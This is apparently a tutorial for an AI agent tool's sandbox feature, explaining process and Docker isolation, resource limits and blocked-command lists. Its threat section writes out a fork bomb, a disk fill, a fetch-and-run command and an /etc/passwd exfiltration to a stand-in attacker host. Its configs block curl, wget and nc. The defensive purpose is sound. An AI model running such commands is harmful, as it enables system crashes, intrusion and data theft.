Sandboxed Execution
Isolate AI agent commands with dual-mode sandboxing — process-level setrlimit or full Docker containers — with configurable resource limits.
1Why Sandbox?
When you run harness --permission bypass, the agent executes commands without asking
for confirmation. That is powerful and efficient — but without isolation, it also means the agent
has unrestricted access to your system.
harness --permission bypass gives an AI agent full access to your system.
That includes network, filesystem, and processes. Consider what happens if the agent is given
a malicious prompt or executes code from an untrusted source.
Real-world attack vectors that sandboxing prevents:
A fork bomb creates unlimited child processes, consuming all system resources and crashing the machine.
:(){ :|:& };:
# Sandbox prevents: max_processes limit blocks this immediately
A crypto miner installs and runs software in the background, consuming CPU indefinitely.
curl -s http://attacker.com/miner | bash
# Sandbox prevents: network blocked + blocked_commands includes curl
Data exfiltration sends sensitive files to an attacker-controlled server over the network.
curl attacker.com -d @/etc/passwd
# Sandbox prevents: network=none blocks all outbound connections
Disk fill creates an enormous file, consuming all available storage and crashing services.
dd if=/dev/zero of=bigfile bs=1G count=100
# Sandbox prevents: max_file_size_mb limit blocks writes above the cap
OpenHands has Docker-only sandbox. SWE-Agent has basic containers. No one offers dual-mode (process + Docker) with configurable resource limits like Harness.
| Feature | Harness | OpenHands | SWE-Agent | Claude Code |
|---|---|---|---|---|
| Process sandbox (no Docker) | ✓ | ✗ | ✗ | ✗ |
| Docker sandbox | ✓ | ✓ | ✓ | ✗ |
| Memory limits | ✓ | Partial | ✗ | ✗ |
| CPU time limits | ✓ | ✗ | ✗ | ✗ |
| Process count limits | ✓ | ✗ | ✗ | ✗ |
| API key stripping | ✓ | ✗ | ✗ | ✗ |
| Blocked command list | ✓ | ✗ | ✗ | ✗ |
2Process Sandbox
The process sandbox uses POSIX setrlimit system calls — the same mechanism the OS
uses to enforce per-process resource limits. No Docker required.
| Resource Limit | System Call | What It Controls |
|---|---|---|
max_memory_mb |
RLIMIT_AS |
Total virtual memory the process can address |
max_cpu_seconds |
RLIMIT_CPU |
CPU time before SIGXCPU / SIGKILL is sent |
max_processes |
RLIMIT_NPROC |
Number of child processes the command can fork |
max_file_size_mb limit is enforced only in Docker sandbox mode via the container
runtime's storage limits. The process sandbox does not set RLIMIT_FSIZE —
only RLIMIT_AS, RLIMIT_CPU, and RLIMIT_NPROC are applied.
- No Docker installation required
- Minimal overhead — native OS calls
- Works on Linux and macOS
- Instant startup — no container spin-up
- Shared filesystem with host
- Not as strong as container isolation
- No network namespace separation
- Suitable for trusted-but-resource-limited code
harness --sandbox process "Run the test suite"
3Docker Sandbox
The Docker sandbox runs every command in an isolated container. It provides the strongest isolation available — separate filesystem, network namespace, and process tree.
--network=none— no network access by default (unlessnetwork_access = true)--memory— hard memory cap enforced by the container runtime--cpus— CPU share limit- API key stripping —
ANTHROPIC_API_KEY,OPENAI_API_KEY,AWS_SECRET_ACCESS_KEY, and others are removed from the environment automatically
- Full filesystem isolation
- Network namespace —
--network=none - Strongest isolation available
- Custom images for reproducible envs
- Docker must be installed
- Docker daemon must be running
- Slower startup than process mode
- Image pull required on first use
harness --sandbox docker "Run the test suite"
# Requires: Docker installed and daemon running
# Default image: python:3.12-slim
4TOML Configuration
Configure sandboxing persistently in .harness/config.toml:
[sandbox]
enabled = true
mode = "process" # "none", "process", or "docker"
max_memory_mb = 512 # Memory limit per command
max_cpu_seconds = 30 # CPU time limit per command
network_access = false # Block network access
docker_image = "python:3.12-slim" # Docker image (docker mode only)
allowed_paths = [
"/home/user/project", # Only allow access to project dir
"/tmp", # And temp directory
]
blocked_commands = [
"rm -rf /", # Block dangerous commands
"curl", # Block network tools
"wget",
"nc",
]
[sandbox] section maps to SandboxConfig — a simple,
flat configuration dataclass used for file-based configuration. When the engine starts a session,
it converts SandboxConfig into a SandboxPolicy (the runtime struct),
which includes the nested ResourceLimits and NetworkPolicy sub-objects.
If you are building pipelines programmatically, construct SandboxPolicy directly
(see the Deep Dive below) rather than going through SandboxConfig.
The complete type hierarchy — use these dataclasses directly when building custom sandboxed pipelines:
from harness.types.sandbox import (
SandboxMode, SandboxPolicy, ResourceLimits, NetworkPolicy
)
# SandboxMode enum
# SandboxMode.NONE = "none" — no isolation
# SandboxMode.PROCESS = "process" — setrlimit isolation
# SandboxMode.DOCKER = "docker" — container isolation
# ResourceLimits defaults
limits = ResourceLimits(
max_memory_mb=512, # 512MB virtual memory cap
max_cpu_seconds=30, # 30 seconds CPU time
max_processes=64, # 64 child processes
max_file_size_mb=100, # 100MB per file written
)
# NetworkPolicy defaults
network = NetworkPolicy(
allow_network=False, # Block all network
allowed_hosts=(), # Allowlist (empty = block all)
blocked_ports=(), # Port blocklist
)
# Full SandboxPolicy
policy = SandboxPolicy(
mode=SandboxMode.DOCKER,
allowed_paths=("/home/user/project", "/tmp"),
blocked_commands=("rm -rf", "curl", "wget", "nc"),
resource_limits=limits,
network=network,
docker_image="python:3.12-slim",
env_passthrough=("HOME", "PATH"), # Pass these through to container
# strip_env defaults (always stripped in both process and Docker modes):
# ANTHROPIC_API_KEY, OPENAI_API_KEY, GOOGLE_API_KEY,
# AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN
)
strip_env defaults are enforced in both process and Docker modes regardless of env_passthrough.
You cannot accidentally pass API keys into the sandbox.
5Trigger Resource Limits
The script below demonstrates all four enforcement mechanisms with intentionally tight limits.
Each test shows how ExecutionResult reports the failure:
# sandbox_demo.py — demonstrates sandbox resource limits
import asyncio
from harness.sandbox.executor import create_executor
from harness.types.sandbox import SandboxPolicy, SandboxMode, ResourceLimits
async def main():
policy = SandboxPolicy(
mode=SandboxMode.PROCESS,
resource_limits=ResourceLimits(
max_memory_mb=64, # Very low — 64MB
max_cpu_seconds=5, # Very short — 5 seconds
max_processes=8, # Very few processes
),
blocked_commands=("rm -rf", "curl", "wget"),
)
executor = create_executor(policy)
# Test 1: Memory limit
print("Test 1: Memory limit (64MB)...")
result = await executor.execute("python3 -c \"x = 'a' * (100 * 1024 * 1024)\"")
print(f" Exit: {result.exit_code}, OOM: {result.oom_killed}")
# Expected: oom_killed=True
# Test 2: CPU timeout
print("Test 2: CPU timeout (5s)...")
result = await executor.execute("python3 -c \"while True: pass\"")
print(f" Exit: {result.exit_code}, Timed out: {result.timed_out}")
# Expected: timed_out=True
# Test 3: Blocked command
print("Test 3: Blocked command...")
error = executor.validate_command("rm -rf /")
print(f" Validation: {error}")
# Expected: "Command blocked by sandbox policy"
# Test 4: Normal execution
print("Test 4: Normal execution...")
result = await executor.execute("echo 'Hello from sandbox!'")
print(f" Output: {result.stdout.strip()}")
print(f" Exit: {result.exit_code}")
# Expected: "Hello from sandbox!", exit_code=0
await executor.cleanup()
asyncio.run(main())
Expected output for each test:
Exit: -9, OOM: True
Exit: -24, Timed out: True
Validation: Command blocked by sandbox policy
Output: Hello from sandbox!
Exit: 0
stdout— captured standard outputexit_code— process exit code (negative = killed by signal)timed_out— True if CPU limit was exceededoom_killed— True if memory limit was exceedederror— error message string if execution failed to start
6CLI Override
Override the configured sandbox mode for a single invocation using --sandbox.
This does not modify config.toml — it applies only to that run:
# Override sandbox mode per invocation
harness --sandbox docker "Run untrusted tests"
harness --sandbox process "Quick analysis"
harness --sandbox none "Trusted local task"
harness --sandbox process "print the output of: python3 -c 'import sys; print(sys.version)'"
to verify the sandbox is active. The output will be the Python version inside the sandbox environment.
7Build an Untrusted Code Runner
Combine sandbox_mode="docker" with permission_mode="bypass"
for a safe, fully-automated code execution pipeline. The Docker sandbox provides
defense-in-depth even when the permission system is permissive:
# untrusted_runner.py
import asyncio
import harness
async def run_untrusted(code: str) -> str:
"""Run AI-generated code in a sandboxed environment."""
prompt = f"""Execute this code and report the output:
```python
{code}
```
If the code fails, explain why and suggest a fix."""
result_text = ""
async for msg in harness.run(
prompt,
provider="anthropic",
model="claude-sonnet-4-20250514",
permission_mode="bypass", # Auto-approve (safe because sandboxed)
sandbox_mode="docker", # Full Docker isolation
max_turns=5,
):
if isinstance(msg, harness.Result):
result_text = msg.text
return result_text
# Example usage
async def main():
# Safe: sandboxed — even if the code is malicious
output = await run_untrusted("""
import os
print(os.listdir('/'))
print(os.environ.get('ANTHROPIC_API_KEY', 'NOT FOUND'))
""")
print(output)
# API key will be "NOT FOUND" because sandbox strips it!
asyncio.run(main())
permission_mode='bypass', the Docker sandbox strips API keys
(as does process mode), blocks network access, and limits resources. The agent cannot
leak credentials or make external calls — regardless of what the code tries to do.
These environment variables are always stripped from the environment in both process and Docker sandbox modes:
strip_env = (
"ANTHROPIC_API_KEY",
"OPENAI_API_KEY",
"GOOGLE_API_KEY",
"AWS_SECRET_ACCESS_KEY",
"GITHUB_TOKEN",
)
You can extend this list via SandboxPolicy(strip_env=(..., "MY_SECRET")),
but the defaults are always enforced — they cannot be overridden to pass through.
-
1
Code arrives from an untrusted source
User-submitted code, AI-generated scripts, or code fetched from a URL.
-
2
harness.run()starts a sandboxed sessionDocker container spins up with
--network=noneand stripped environment. -
3
Agent executes the code inside the container
Even malicious code cannot escape the container, access the network, or read API keys.
-
4
Output is returned safely to your application
Container is destroyed after execution — no persistent state remains.
8Next Steps
You now have sandboxed execution configured. Here is what to explore next:
- Combine sandboxing with audit logging (Tutorial 06) — every sandboxed command is hash-chained in the audit trail
- Use custom Docker images (
docker_image = "myorg/my-env:latest") to match your production environment exactly - Set
allowed_pathsto restrict filesystem access to your project directory only - Explore Sub-Agents (Tutorial 08) — each sub-agent can run in its own sandbox with independent resource limits